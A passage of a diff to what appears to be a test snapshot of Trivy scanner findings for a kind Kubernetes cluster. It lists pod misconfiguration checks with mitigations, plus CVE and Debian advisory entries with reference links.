"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3134-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3161-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3366-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u11", + "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3412-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0033", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0033", + ], + }, + "category": "Misconfiguration", + "description": "Activate garbage collector on pod termination, as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", + "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://avd.aquasec.com/misconfig/kcv0033", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0034", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0034", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://avd.aquasec.com/misconfig/kcv0034", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0038", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0038", + ], + }, + "category": "Misconfiguration", + "description": "Enable kubelet server certificate rotation on controller-manager.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", + "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://avd.aquasec.com/misconfig/kcv0038", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", ], }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "1.8.2.2", + "packageName": "apt", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": 